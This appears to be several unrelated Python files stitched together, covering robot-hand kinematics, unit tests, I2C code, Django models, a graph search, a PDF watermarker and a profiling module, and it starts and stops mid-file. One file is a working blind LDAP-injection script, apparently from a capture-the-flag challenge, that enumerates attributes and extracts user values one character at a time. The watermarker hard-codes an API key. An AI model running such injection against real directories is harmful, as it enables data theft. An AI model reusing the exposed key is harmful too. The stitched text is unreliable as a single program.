    # not match the joint lists in the comments below — verify against the
    # hand's actual DOF layout.
    th_thumb = theta[0:3, :]
    th_index = theta[4:6, :]
    th_middle = theta[7:9, :]
    th_ring = theta[10:13, :]
    # TODO(review): wraps a scalar and a slice into one ragged array — confirm
    # the intended pinky joint vector shape.
    th_pinky = np.array([[theta[10], theta[14:16]]])

    # Update the locations of each tip
    kin_thumb.fkin(th_thumb, p_thumb, R_thumb)
    kin_index.fkin(th_index, p_index, R_index)
    kin_middle.fkin(th_middle, p_middle, R_middle)
    kin_ring.fkin(th_ring, p_ring, R_ring)
    kin_pinky.fkin(th_pinky, p_pinky, R_pinky)

    # Calculate all the errors from the previous step:
    e_thumb = etip(p_thumb, pd_thumb, R_thumb, Rd_thumb)
    e_index = etip(p_index, pd_index, R_index, Rd_index)
    e_middle = etip(p_middle, pd_middle, R_middle, Rd_middle)
    e_ring = etip(p_ring, pd_ring, R_ring, Rd_ring)
    e_pinky = etip(p_pinky, pd_pinky, R_pinky, Rd_pinky)

    # Read some input, either of thumb position + closed state, or just what number to be achieved
    # TODO: Set up subscriber to a gui?
    #       Would want the gui to not constantly send messages, but only send a
    #       message when a button is pressed like enter to send message
    # Inputs from gui:
    #   Current position of thumb? (let person move thumb in designated x, y, z way)
    #   Whether open or close finger count
    # OR
    #   Current position of thumb?
    #   What number to go to?
    # From message, determine which finger to close (if closed == true)
    # If 1st option, determine what the closest finger is to close with thumb

    # if condition open vs. closed changed:
    p_t0 = p_thumb
    p_i0 = p_index
    p_m0 = p_middle
    p_r0 = p_ring
    p_p0 = p_pinky

    # TBH all the index through pinky fingers are likely going to have p_x0 be
    # open or closed. NOTE(review): the branches below are still pseudo-code —
    # every assignment runs unconditionally, so the last pair always wins.
    p_thumb_goal = p_thumb_open
    p_index_goal = p_index_open
    p_middle_goal = p_middle_open
    p_ring_goal = p_ring_open
    p_pinky_goal = p_pinky_open
    # if closed && 9
    p_thumb_goal = p_thumb_ti
    p_index_goal = p_index_ti
    # else if closed && 8
    p_thumb_goal = p_thumb_tmn
    p_middle_goal = p_middle_tm
    # else if closed && 7
    p_thumb_goal = p_thumb_tr
    p_ring_goal = p_ring_tr
    # else if closed && 6
    p_thumb_goal = p_thumb_tp
    p_pinky_goal = p_pinky_tp

    # Now that we have all the goals, we can calculate the desired positions
    (pd_thumb, vd_thumb) = desired(t, total_t, p_t0, p_thumb_goal)
    (pd_index, vd_index) = desired(t, total_t, p_i0, p_index_goal)
    (pd_middle, vd_middle) = desired(t, total_t, p_m0, p_middle_goal)
    (pd_ring, vd_ring) = desired(t, total_t, p_r0, p_ring_goal)
    # BUG FIX: previously reused the ring start/goal (p_r0, p_ring_goal)
    (pd_pinky, vd_pinky) = desired(t, total_t, p_p0, p_pinky_goal)

    # From these desired positions and velocities, we can probably get:
    # Calculate thetas for the thumb position.
    # BUG FIX (all five fingers): J[0:2, :] selects only two rows although the
    # translational Jacobian is documented as 3 x dofs; use 0:3.
    vr_thumb = vd_thumb + lam * e_thumb            # 3 x 1 column vector
    Jv_thumb = J_thumb[0:3, :]                     # 3 x dofs matrix
    Jvinv_thumb = np.linalg.pinv(Jv_thumb)         # dofs x 3 matrix
    theta_dot_thumb = Jvinv_thumb @ vr_thumb       # dofs x 1 column vector
    # TODO(review): theta = theta_dot * dt overwrites rather than integrates
    # (no += / previous theta term) — confirm intended update rule.
    theta_thumb = theta_dot_thumb * dt             # theta_palm, theta_palm_updown, theta_12, theta_23

    # Calculate thetas for index position
    vr_index = vd_index + lam * e_index            # 3 x 1 column vector
    Jv_index = J_index[0:3, :]                     # 3 x dofs matrix
    Jvinv_index = np.linalg.pinv(Jv_index)         # dofs x 3 matrix
    theta_dot_index = Jvinv_index @ vr_index       # dofs x 1 column vector
    theta_index = theta_dot_index * dt             # index_palm, index_12, index_23

    # Calculate thetas for middle position
    vr_middle = vd_middle + lam * e_middle         # 3 x 1 column vector
    Jv_middle = J_middle[0:3, :]                   # 3 x dofs matrix
    Jvinv_middle = np.linalg.pinv(Jv_middle)       # dofs x 3 matrix
    theta_dot_middle = Jvinv_middle @ vr_middle    # dofs x 1 column vector
    theta_middle = theta_dot_middle * dt           # middle_palm, middle_12, middle_23

    # Calculate thetas for ring position
    vr_ring = vd_ring + lam * e_ring               # 3 x 1 column vector
    Jv_ring = J_ring[0:3, :]                       # 3 x dofs matrix
    Jvinv_ring = np.linalg.pinv(Jv_ring)           # dofs x 3 matrix
    theta_dot_ring = Jvinv_ring @ vr_ring          # dofs x 1 column vector
    theta_ring = theta_dot_ring * dt               # rp_palm, ring_rp, ring_12, ring_23

    # Calculate thetas for pinky position
    vr_pinky = vd_pinky + lam * e_pinky            # 3 x 1 column vector
    Jv_pinky = J_pinky[0:3, :]                     # 3 x dofs matrix
    Jvinv_pinky = np.linalg.pinv(Jv_pinky)         # dofs x 3 matrix
    theta_dot_pinky = Jvinv_pinky @ vr_pinky       # dofs x 1 column vector
    theta_pinky = theta_dot_pinky * dt             # rp_palm, pinky_rp, pinky_12, pinky_23

    # NOTE: RIGHT NOW RP_PALM IS IN BOTH THE PINKY BEND AND THE RING FINGER BEND.
    # THIS MAY NOT BE AN ISSUE AS RIGHT NOW RP_PALM IS BEING TREATED AS FIXED, BUT IF
    # WE ACTUALLY FIXED THIS JOINT THEN WE MAY AVOID ERRORS. FOR NOW, WE'RE GOING TO ASSUME IT
    # AS BEING FIXED, ST. theta_pinky[0] == theta_ring[0]
    theta = np.vstack((theta_thumb, theta_index, theta_middle, theta_ring, theta_pinky[1:N_pinky-1]))
|
# Read one integer per line until EOF. For each value `limit`, report how many
# numbers the triangle sequence contains (1 + sum(0..limit)), then print the
# sequence itself: a leading 0 followed by each i in 1..limit repeated i times.
case_no = 1
while True:
    try:
        limit = int(input())
        total = 1 + sum(range(limit + 1))
        if total == 1:
            print('Caso {}: {} numero'.format(case_no, total))
        else:
            print('Caso {}: {} numeros'.format(case_no, total))
        if limit == 0:
            print(0)
        elif limit > 0:
            # '0' then each value repeated value times, space separated
            tokens = ['0'] + [str(value)
                              for value in range(1, limit + 1)
                              for _ in range(value)]
            print(' '.join(tokens))
        else:
            print(0, end=' ')
        print('')
        case_no += 1
    except EOFError:
        break
from unittest import TestCase
from unittest import main as run_tests
from mock import mock_open, patch, MagicMock
from ..firestarter.firestarter import FireStarter
from ..firestarter.readers import HttpApi
from ..firestarter.igniters import Lighter
from ..firestarter.writers import HadoopFileSystem
from ..firestarter.pyspark import SparkConf, SparkContext
import json
class TestFireStarter(TestCase):
    """Unit tests for the FireStarter pipeline driver.

    Covers construction, config reading/parsing, module loading,
    spark-context creation and the execute() orchestration sequence.
    """

    def setUp(self):
        # Fresh instance per test; config_data is pre-seeded so tests that
        # bypass read_config_file() still have content to work with.
        self.config_file = 'config_file.json'
        self.firestarter = FireStarter(self.config_file)
        self.firestarter.config_data = 'foo'

    def test_init(self):
        # The constructor should only record the path, not read the file.
        # NOTE(review): patch.object(__builtins__, ...) assumes __builtins__ is
        # a module; in an imported module it can be a dict — fragile patching.
        with patch.object(__builtins__, 'open', mock_open(read_data='foo')):
            self.assertEqual(self.firestarter.config_file, self.config_file)

    def test_read_config_file(self):
        # read_config_file() stores the raw file contents on config_data.
        config_data = '{"json":"data"}'
        with patch.object(__builtins__, 'open', mock_open(read_data=config_data)):
            self.firestarter.read_config_file()
            self.assertEqual(self.firestarter.config_data, config_data)

    def test_parse_config_contents(self):
        # A config containing a 'modules' key parses successfully.
        config = {'modules': {}}
        with patch.object(json, 'loads', return_value=config):
            self.firestarter.parse_config_contents()
            self.assertEqual(self.firestarter.config, config)

    def test_parse_config_contents_throws_value_error(self):
        # A config missing the 'modules' key is rejected with ValueError.
        config = {'no_readers_defined': {}}
        with patch.object(json, 'loads', return_value=config):
            with self.assertRaises(ValueError):
                self.firestarter.parse_config_contents()

    def test_load_all_modules(self):
        # Each configured module should be instantiated via the type->class
        # mappings and registered in .modules and .data under its name.
        self.firestarter.config = {"modules": [{"name": "my_rest_api","type": "http_api","parameters": {"url": "http://drunken.guru/"}},{"name": "hive_query","type": "http_api","parameters": {"url": "http://original.guru/"}},{"name": "crunch_the_numbers","type": "lighter","parameters": {"math_rules": "2+2=4"}},{"name": "data_center_cluster","type": "hdfs","parameters": {"hive_table": "mydb.table.name"}}]}
        with patch.object(HttpApi, '__init__', return_value=None):
            with patch.object(Lighter, '__init__', return_value=None):
                with patch.object(HadoopFileSystem, '__init__', return_value=None):
                    mock_http_api = MagicMock()
                    mock_lighter = MagicMock()
                    mock_hdfs = MagicMock()
                    mock_http_api.data = ['hello']
                    mock_lighter.data = ['world']
                    mock_hdfs.data = ['yall']
                    self.firestarter.mappings = mappings = {'http_api': mock_http_api, 'lighter': mock_lighter, 'hdfs': mock_hdfs}
                    self.firestarter.load_modules()
                    self.assertIn('my_rest_api', self.firestarter.modules)
                    # Identity check: module data must be the mock's data object itself.
                    self.assertEqual(id(self.firestarter.modules['my_rest_api'].data), id(mock_http_api.data))
                    self.assertIn('hive_query', self.firestarter.modules)
                    self.assertIn('data_center_cluster', self.firestarter.modules)
                    self.assertIn('my_rest_api', self.firestarter.data)
                    self.assertIn('hive_query', self.firestarter.data)
                    self.assertIn('data_center_cluster', self.firestarter.data)

    def test_create_spark_context(self):
        # SparkConf should receive the app name and each parameter pair, and a
        # SparkContext should be created from the resulting config.
        self.firestarter.config = {"spark_conf": {"app_name": "Fill Your Mother", "parameters": {"num_executors:": 4}}}
        with patch.object(SparkConf, '__init__', return_value=None) as mock_spark_conf:
            with patch.object(SparkConf, 'set', return_value=True) as mock_set:
                with patch.object(SparkConf, 'setAppName', return_value=True) as mock_set_app_name:
                    with patch.object(SparkContext, '__init__', return_value=None) as mock_spark_context:
                        self.firestarter.create_spark_context()
                        mock_set_app_name.assert_called_once_with("Fill Your Mother")
                        # NOTE(review): unpacking a set relies on iteration
                        # order; with two distinct items this is brittle.
                        mock_set.assert_called_once_with(*set(["num_executors:", 4]))
                        mock_spark_context.assert_called_once_with(**{"conf": self.firestarter.spark_config})
                        self.assertIsInstance(self.firestarter.sc, SparkContext)

    def test_execute(self):
        # execute() should invoke the four pipeline stages exactly once each.
        self.firestarter.read_config_file = MagicMock()
        self.firestarter.parse_config_contents = MagicMock()
        self.firestarter.load_modules = MagicMock()
        self.firestarter.run_modules = MagicMock()
        self.firestarter.execute()
        self.firestarter.read_config_file.assert_called_once_with()
        self.firestarter.parse_config_contents.assert_called_once_with()
        self.firestarter.load_modules.assert_called_once_with()
        self.firestarter.run_modules.assert_called_once_with()

    # #integration test!
    # def test_load_all_modules(self):
    #     self.firestarter.config = {"readers": [{"name": "my_rest_api","type": "http_api","parameters": {"url": "http://drunken.guru/"}}, {"name": "hive_query","type": "http_api","parameters": {"url": "http://original.guru/"}}],"igniters": [{"name": "crunch_the_numbers","type": "lighter","parameters": {"math_rules": "2+2=4"}}],"writers": [{"name": "data_center_cluster","type": "hdfs","parameters": {"hive_table": "mydb.table.name"}}]}
    #     with patch.object(Lighter, '__init__', return_value=None):
    #         with patch.object(HadoopFileSystem, '__init__', return_value=None):
    #             self.firestarter.load_modules()
    #             self.assertIsInstance(self.firestarter.readers[0], HttpApi)
    #             self.assertIsInstance(self.firestarter.readers[1], HttpApi)
    #             self.assertIsInstance(self.firestarter.igniters[0], Lighter)
    #             self.assertIsInstance(self.firestarter.writers[0], HadoopFileSystem)
    #             self.assertIsInstance(self.firestarter.modules['my_rest_api'], HttpApi)
    #             self.assertIsInstance(self.firestarter.modules['hive_query'], HttpApi)
    #             self.assertIsInstance(self.firestarter.modules['readers'][0], HttpApi)
    #             self.assertIsInstance(self.firestarter.modules['igniters'][0], Lighter)
    #             self.assertIsInstance(self.firestarter.modules['writers'][0], HadoopFileSystem)
    #             self.assertEqual(self.firestarter.modules['my_rest_api'], self.firestarter.readers[0])
# Allow running this test module directly (unittest.main aliased as run_tests).
if __name__ == '__main__':
    run_tests()
|
import smbus
BUS = 1  # Which smbus to use, i.e /dev/i2c-1 is bus = 1
ADDRESS = 0x48  # Address of the device to talk to over I2C/smbus

# Setup SMBus access
bus = smbus.SMBus(BUS)

# Read two bytes from register 01, the config register
config = bus.read_word_data(ADDRESS, 0x01) & 0xFFFF
print('Config value: 0x{0:04X}'.format(config))

# Write two bytes to the config register
new_config = 0b0100001110000011
bus.write_word_data(ADDRESS, 0x01, new_config)

# Read two bytes from register 00, the ADC value.
value = bus.read_word_data(ADDRESS, 0x00) & 0xFFFF
# Swap byte order from little endian to big endian.
# BUG FIX: the low byte must be masked with 0xFF before shifting; the previous
# (value & 0xFFFF) << 8 kept the high byte too, yielding a 24-bit result.
value = ((value & 0xFF) << 8) | (value >> 8)
print('Raw ADC value: 0x{0:04X}'.format(value))
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) Qotto, 2019
from .make_coffee import MakeCoffee
__all__ = [
'MakeCoffee',
]
|
# -*- coding: utf-8 -*-
from struct import pack, unpack
class Field(object):
    """Abstract base class for wire-format fields packed to/from bytes."""

    # Encoded size in bytes; None means variable-length or undefined.
    LENGTH = None

    def contribute_to_class(self, cls, name):
        # Register this field instance on the owning class' _meta registry.
        cls._meta.add_field(self, name)

    @classmethod
    def guess_length(cls, data):
        """Return the byte length of the next encoded value in *data*."""
        return cls.LENGTH

    @classmethod
    def decode(cls, data):
        """Decode *data* into a Python value (subclasses must override)."""
        raise NotImplementedError()

    @classmethod
    def encode(cls, value):
        """Encode *value* into bytes (subclasses must override)."""
        raise NotImplementedError()
class NumericField(Field):
    """Base for fixed-width numeric fields serialized via struct."""

    LENGTH = None       # byte width of the packed value
    PACK_FORMAT = None  # struct format string, e.g. "!i"

    @classmethod
    def get_min_value(cls):
        """Smallest encodable value (subclass hook)."""
        raise NotImplementedError()

    @classmethod
    def get_max_value(cls):
        """Largest encodable value (subclass hook)."""
        raise NotImplementedError()

    @classmethod
    def decode(cls, data):
        """Unpack *data* into a single number."""
        (value,) = unpack(cls.PACK_FORMAT, data)
        return value

    @classmethod
    def encode(cls, value):
        """Pack *value*; raise OverflowError when outside the allowed range."""
        if not cls.get_min_value() <= value <= cls.get_max_value():
            raise OverflowError()
        return pack(cls.PACK_FORMAT, value)
class SignedNumericField(NumericField):
    """Signed integer field whose range is derived from LENGTH.

    NOTE(review): the minimum is -(2**(8*LENGTH-1)) + 1, which excludes the
    most-negative two's-complement value — possibly intentional (symmetric
    range); confirm against the wire protocol before changing.
    """

    @classmethod
    def get_min_value(cls):
        return -pow(2, 8 * cls.LENGTH - 1) + 1

    @classmethod
    def get_max_value(cls):
        return pow(2, 8 * cls.LENGTH - 1) - 1
class UnsignedNumericField(NumericField):
    """Unsigned integer field with range 0 .. 2**(8*LENGTH) - 1."""

    @classmethod
    def get_min_value(cls):
        return 0

    @classmethod
    def get_max_value(cls):
        return pow(2, 8 * cls.LENGTH) - 1
class ByteField(SignedNumericField):
    """Signed 8-bit integer, network byte order."""
    LENGTH = 1
    PACK_FORMAT = "!b"
class UnsignedByteField(UnsignedNumericField):
    """Unsigned 8-bit integer (0..255), network byte order.

    The previous version redefined get_min_value/get_max_value with bodies
    identical to UnsignedNumericField's; the duplicates are removed and the
    inherited implementations (which yield the same 0..255 range) are used.
    """
    LENGTH = 1
    PACK_FORMAT = "!B"
class UnsignedShortField(UnsignedByteField):
    """Unsigned 16-bit integer, network byte order.

    Inherits the unsigned range logic via UnsignedByteField; only the width
    and format differ.
    """
    LENGTH = 2
    PACK_FORMAT = "!H"
class IntField(SignedNumericField):
    """Signed 32-bit integer, network byte order."""
    LENGTH = 4
    PACK_FORMAT = "!i"
class LongLongField(SignedNumericField):
    """Signed 64-bit integer, network byte order."""
    LENGTH = 8
    PACK_FORMAT = "!q"
class FloatField(NumericField):
    """IEEE-754 single-precision float, network byte order."""
    LENGTH = 4
    PACK_FORMAT = "!f"

    @classmethod
    def get_min_value(cls):
        # Range check is effectively disabled; struct.pack raises for
        # unrepresentable values instead.
        return float("-inf")  # OverflowError will be raised at runtime

    @classmethod
    def get_max_value(cls):
        return float("inf")  # OverflowError will be raised at runtime

    @classmethod
    def encode(cls, value):
        # Coerce ints/decimals to float before packing.
        return super(FloatField, cls).encode(float(value))

    @classmethod
    def decode(cls, data):
        return float(super(FloatField, cls).decode(data))
class DoubleField(FloatField):
    """IEEE-754 double-precision float, network byte order."""
    LENGTH = 8
    PACK_FORMAT = "!d"
class BoolField(Field):
    """Boolean encoded as a single signed byte (True -> 1, False -> 0)."""
    LENGTH = 1

    @classmethod
    def decode(cls, data):
        return bool(ByteField.decode(data))

    @classmethod
    def encode(cls, value):
        # bool is an int subclass, so ByteField packs it directly.
        return ByteField.encode(bool(value))
class StringField(Field):
    """UTF-8 string prefixed with an unsigned 16-bit byte length."""

    # Field type used for the length prefix.
    LENGTH_FIELD = UnsignedShortField

    @classmethod
    def guess_length(cls, data):
        # encoded data length + actual data
        return cls.LENGTH_FIELD.LENGTH + cls.LENGTH_FIELD.decode(data[:cls.LENGTH_FIELD.LENGTH])

    @classmethod
    def decode(cls, data):
        # Assumes *data* holds exactly one encoded string (prefix + payload);
        # the prefix bytes are skipped, not validated against len(data).
        return data[cls.LENGTH_FIELD.LENGTH:].decode("utf-8")

    @classmethod
    def encode(cls, value):
        value = value.encode("utf-8")
        return cls.LENGTH_FIELD.encode(len(value)) + value
|
from django.db import models
from django.db.models.query import QuerySet
from django.utils.translation import ugettext_lazy as _
from teams.models import Team
class MatchMixin(object):
    """Behaviour shared by MatchQuerySet and MatchManager (currently empty)."""
    pass
class MatchQuerySet(QuerySet, MatchMixin):
    """QuerySet for Match with the shared mixin behaviour."""
    pass
class MatchManager(models.Manager, MatchMixin):
    """Default manager returning MatchQuerySet instances."""

    def get_queryset(self):
        return MatchQuerySet(self.model, using=self._db)
class Match(models.Model):
    """
    Model to store details of a match played between two teams.
    """
    # NOTE(review): related_name "team1_metch" is misspelled; left unchanged
    # because renaming it alters the reverse-accessor API (and any queries
    # using it) and needs a coordinated fix. Wrapping related_name in _() is
    # also unusual — related names are identifiers, not translatable text.
    team1 = models.ForeignKey(Team, related_name=_("team1_metch"), on_delete=models.CASCADE)
    team2 = models.ForeignKey(Team, related_name=_("team2_match"), on_delete=models.CASCADE)
    date = models.DateField(_("match date"))
    winning_stat = models.CharField(_("Winning stats"), max_length=64, default='')
    # Nullable: a match may be drawn or not yet decided.
    winner = models.ForeignKey(Team, related_name=_("winner_team"), null=True, on_delete=models.CASCADE)
    objects = MatchManager()

    class Meta:
        verbose_name = "Match"
        verbose_name_plural = "Matches"  # fixed typo: was "Matchs"
        app_label = "matches"
        ordering = ("-date", )

    def __unicode__(self):
        # Human-readable label, e.g. "TeamA vs TeamB" (Python 2 era API).
        return "%s" % (self.team1.name + " vs " + self.team2.name)
|
import requests
import string
# Target host of the LDAP-injection CTF challenge.
base_url = 'http://jh2i.com:50019'
empty_size = 0
# Baseline: size of the response page for a search with no matches; later
# requests compare against this to detect a hit.
# NOTE(review): this HTTP request runs at import time.
req = requests.get(base_url + '/?search=asdf')
empty_size = len(req.content)
def attribFinder(attrib):
    """Probe whether any directory entry exposes *attrib* via wildcard injection.

    A response larger than the empty-result baseline indicates the attribute
    exists on at least one entry.
    """
    response = requests.get(base_url + '/?search=*)(' + attrib + '=*')
    if len(response.content) != empty_size:
        print('[*] Something found for attribute: ' + attrib)
#attribs = ['dc','o','ou','cn','uid','mail','member','uniquemember','memberof','sAMAccountName', 'primaryGroupToken','primaryGroupID']
attribs = ['buildingname', 'c', 'cn', 'co', 'comment', 'commonname', 'company', 'description', 'distinguishedname', 'dn', 'department', 'displayname', 'facsimiletelephonenumber', 'fax', 'friendlycountryname', 'givenname', 'homephone', 'homepostaladdress', 'info', 'initials', 'ipphone', 'l', 'mail', 'mailnickname', 'rfc822mailbox', 'mobile', 'mobiletelephonenumber', 'name', 'othertelephone', 'ou', 'pager', 'pagertelephonenumber', 'physicaldeliveryofficename', 'postaladdress', 'postalcode', 'postofficebox', 'samaccountname', 'serialnumber', 'sn', 'surname', 'st', 'stateorprovincename', 'street', 'streetaddress', 'telephonenumber', 'title', 'uid', 'url', 'userprincipalname', 'wwwhomepage']
'''
for attrib in attribs:
attribFinder(attrib)
'''
# found attribs: ['cn', 'commonname', 'description', 'displayname', 'givenname', 'mail', 'rfc822mailbox', 'name', 'sn', 'surname']
def valueFinder(username, attrib, prefix=''):
    """Recover the value of *attrib* for *username* one character at a time.

    Classic blind LDAP-injection oracle: extend the current prefix with each
    candidate character and test `attrib=<prefix><char>*`; a response larger
    than the empty baseline confirms the character. Stops when no candidate
    extends the match.
    """
    current = prefix
    searchSpace = string.ascii_lowercase + string.digits + '@.-/ {}_'
    while True:
        for char in searchSpace:
            response = requests.get(base_url + '/?search=' + username + ')(' + attrib + '=' + current + char + '*')
            if len(response.content) != empty_size:
                current += char
                #print('[*] Found next char of attrib: ' + current)
                break
        else:
            # no character matched: the full value has been recovered
            break
    print('[*] Finished searching, found attrib value pair ' + attrib + ':' + current + ' for ' + username)
# Account names enumerated previously; extract each found attribute for each.
usernames = ['administrator', 'congon4tor', 'george.ward', 'lesley.graham', 'brynn.wilson', 'will.newman', 'justice.ryan', 'mel.simpson', 'sam.fisher', 'reggie.evans', 'angel.campbell', 'terry.molina']
found_attribs = ['commonname', 'description', 'displayname', 'givenname', 'rfc822mailbox', 'name', 'sn', 'surname']
# I removed cn cuz that's useless and mail cuz that's visible
for username in usernames:
    print('[*] Searching for ' + username)
    for attrib in found_attribs:
        valueFinder(username, attrib)
'''
# attempted cheese to find any attrib with flag{ but it's failing rip
for attrib in found_attribs:
    print('[*] Searching for ' + attrib)
    valueFinder('*', attrib, 'flag')
'''
|
from cryptography.fernet import Fernet
from django.conf import settings
def encryption_key(val):
    """Fernet-encrypt *val* (stringified) using the project key; returns bytes."""
    cipher = Fernet(settings.CRYPTOGRAPHY_KEY)
    return cipher.encrypt(str(val).encode())
def decryption_key(val):
    """Decrypt a Fernet token string back to its original text."""
    cipher = Fernet(settings.CRYPTOGRAPHY_KEY)
    return cipher.decrypt(val.encode()).decode()
def get_ip(request):
    """Best-effort client IP: first X-Forwarded-For entry, else REMOTE_ADDR, else ''."""
    meta = request.META
    forwarded = meta.get('HTTP_X_FORWARDED_FOR', meta.get('REMOTE_ADDR', ''))
    return forwarded.split(',')[0].strip()
def get_browser(request):
    """Return the request's User-Agent header, or '' when absent.

    The previous direct indexing raised KeyError for clients that send no
    User-Agent header; a missing header now yields an empty string, matching
    get_ip()'s tolerant style.
    """
    return request.META.get('HTTP_USER_AGENT', '')
def add_two(x, y):
    """Return the sum of *x* and *y* (named equivalent of the lambda below)."""
    total = x + y
    return total
# A lambda equivalent to add_two; as a bare expression statement its value is
# discarded — shown only for comparison.
lambda x, y: x + y
add_two(10, 5) # 15
# Immediately-invoked lambda: same result as the named function.
(lambda x, y: x + y)(10, 5) # 15
def who(data, identify):
    """Apply the *identify* callback to *data* and return its result."""
    extractor = identify
    return extractor(data)
def my_identifier_function(data):
    """Return the 'name' entry of a user mapping."""
    name_key = 'name'
    return data[name_key]
# Demo: extract the name via a named callback function.
user = {'name': 'Damiano', 'surname': 'Alves'}
print(who(user, my_identifier_function))
def identifier(data, identify):
    """Same contract as who(): delegate extraction of *data* to *identify*."""
    result = identify(data)
    return result
# Demo: same extraction using an inline lambda instead of a named callback.
# (Note the trailing space in 'Alves ' — preserved from the original data.)
user = {'name': 'Damiano', 'surname': 'Alves '}
print(identifier(user, lambda x: x['name']))
|
# Adjacency map for the demo graph: node -> tuple of neighbour nodes.
# Edges are listed per direction (e.g. 4 lists 6 and 6 lists 4).
g = {
    0: (1,),
    1: (0,2,3),
    2: (1,3,4),
    3: (1,2),
    4: (2,6),
    5: (6,),
    6: (5,4)
}
def DFSUtil(v, visited, graph=None):
    """Depth-first traversal from *v*, printing each vertex as it is visited.

    :param v: start vertex
    :param visited: set of already-visited vertices, mutated in place
    :param graph: adjacency mapping (vertex -> iterable of neighbours);
        defaults to the module-level ``g`` for backward compatibility.
        The original hard-coded the global, making the function untestable
        against other graphs.
    """
    if graph is None:
        graph = g
    # Mark the current node as visited
    visited.add(v)
    print(v, end=' ')
    # Recur for all the vertices adjacent to this vertex
    for neighbor in graph[v]:
        if neighbor not in visited:
            DFSUtil(neighbor, visited, graph)
def DFS(v, graph=None):
    """Run a depth-first traversal from *v* with a fresh visited set.

    :param graph: optional adjacency mapping forwarded to DFSUtil; defaults
        to the module-level ``g`` (backward compatible with DFS(v)).
    """
    visited = set()
    DFSUtil(v, visited, graph)
# Demo: start the traversal from vertex 2 and print the visit order.
v = 2
print(f'Following is DFS starting from vertex {v}')
DFS(v)
|
from pyfiles.db import position
from pyfiles.model import map
from pony.orm import Required, Optional, db_session
class Overworld(map.Map):
    """Top-level world map: a fixed-size square grid."""

    # Grid dimensions in tiles.
    OVERWORLD_SIZE_X = 22
    OVERWORLD_SIZE_Y = 22

    # Returns the starting position for all characters on the map
    @db_session
    def get_starting_pos(self) -> 'position.Position':
        # Centre of the map; the Position row is created with no owning
        # character. (Annotation corrected: the method returns a Position
        # object, not an (int, int) tuple.)
        _START_POS = position.Position(character=None, pos_x=int(self.map_size_x/2), pos_y=int(self.map_size_y/2))
        print ("Overworld starting pos: "+_START_POS.to_string())
        return _START_POS

    def __init__(self):
        super().__init__(self.OVERWORLD_SIZE_X, self.OVERWORLD_SIZE_Y)
# Keep a global instance so we don't have to pass it around
ovrwrld = None

def getOverworld():
    """Lazily create and return the singleton Overworld instance."""
    global ovrwrld
    if ovrwrld is None:
        ovrwrld = Overworld()
    return ovrwrld
|
from PyPDF2 import PdfFileWriter, PdfFileReader, PdfFileMerger
from reportlab.pdfgen import canvas
import random
import string
import time
from canvasapi import Canvas as Lms
API_URL = "https://canvas.oregonstate.edu/"
# Canvas API key
# SECURITY(review): hard-coded credential committed to source. This key is
# exposed and should be revoked immediately and loaded from an environment
# variable or secrets store instead of the repository.
API_KEY = "1002~m1ShsxLu5bZY6SbSd5KlXjN9ejluixXwRFVYDvVQhGjIMx46dLJqS81NfZtCeTRJ"
def create_watermark(input_pdf, output, watermark, x=None, y=None):
    """Stamp every page of *input_pdf* with a freshly generated watermark PDF.

    :param input_pdf: path of the PDF to stamp
    :param output: path the stamped PDF is written to
    :param watermark: path used for the intermediate one-page watermark PDF
    :param x, y: placement of the watermark image; when omitted, a random
        position is chosen per call. BUG FIX: the original evaluated
        random.randint(...) in the default arguments, freezing one random
        position at import time for every call.
    """
    if x is None:
        x = random.randint(0, 300)
    if y is None:
        y = random.randint(0, 500)
    c = canvas.Canvas(watermark)
    # NOTE(review): reportlab canvases have no 'globalAlpha' attribute, so this
    # assignment is a silent no-op — setFillAlpha/setStrokeAlpha is probably
    # what was intended. Left unchanged to preserve current output.
    c.globalAlpha = 0.1
    # Draw the image at x, y. I positioned the x,y to be where i like here
    c.drawImage('src_2.png', x, y, width=300, height=300, mask='auto')
    # Fetch the course name from Canvas and stamp it along with a timestamp.
    lms = Lms(API_URL, API_KEY)
    course = lms.get_course(1836569)
    c.drawString(30, 30, "Oregonstate: " + str(course))
    c.drawString(30, 750, str(int(time.time())))
    # Encode "Spongebob" as upper-case hex, stamp it reversed as a tracer code.
    temp = "Spongebob".encode('utf-8')
    r = ["0x{:04x}".format(ch)[2:] for ch in temp]
    code = "".join(r)
    code = code.upper()
    print(code)
    print(code[::-1])
    c.drawString(320, 750, code[::-1])
    c.save()
    # Merge the generated watermark page onto every page of the input.
    watermark_obj = PdfFileReader(watermark)
    watermark_page = watermark_obj.getPage(0)
    pdf_reader = PdfFileReader(input_pdf)
    pdf_writer = PdfFileWriter()
    for page_index in range(pdf_reader.getNumPages()):
        page = pdf_reader.getPage(page_index)
        page.mergePage(watermark_page)
        pdf_writer.addPage(page)
    with open(output, 'wb') as out:
        pdf_writer.write(out)
if __name__ == '__main__':
    # Demo invocation: stamp input.pdf with watermark.pdf at a fixed position.
    a = 'input.pdf'
    b = 'watermark.pdf'
    c = 'watermark_small.pdf'  # defined but unused in this invocation
    create_watermark(
        input_pdf=a,
        output='watermarked.pdf',
        watermark=b,
        x = 150,
        y = 250
    )
from django.contrib import admin
from .models import Artist, By, Song, User
# Expose the app's models in the Django admin with default ModelAdmin options.
admin.site.register(User)
admin.site.register(Song)
admin.site.register(Artist)
admin.site.register(By)
|
#!/usr/bin/env python
#
# Copyright (c) 2019 Opticks Team. All Rights Reserved.
#
# This file is part of Opticks
# (see https://bitbucket.org/simoncblyth/opticks).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
profilesmry.py
===============
::
an ; ip profilesmry.py
## loads times from scans, after manual adjustment of pfx and cat startswith in __main__
"""
from __future__ import print_function
import os, sys, re, logging, numpy as np, argparse, textwrap
from collections import OrderedDict as odict
log = logging.getLogger(__name__)
from opticks.ana.num import Num
from opticks.ana.base import findfile
from opticks.ana.profile_ import Profile
from opticks.ana.bashnotes import BashNotes
class ProfileSmry(object):
    """
    A ProfileSmry is an ordered dict of Profiles, keyed by cat
    the Profiles are read from OpticksProfile.npy files written
    by Opticks executables.
    """
    # Default directory (env var reference) beneath which scan prefixes live.
    BASE = "$OPTICKS_EVENT_BASE"

    @classmethod
    def LoadHit_(cls, htpath):
        """Load the hit array at *htpath*, or None when the file is absent."""
        return np.load(htpath) if os.path.exists(htpath) else None

    @classmethod
    def Load_(cls, pfx, base, startswith=None):
        """
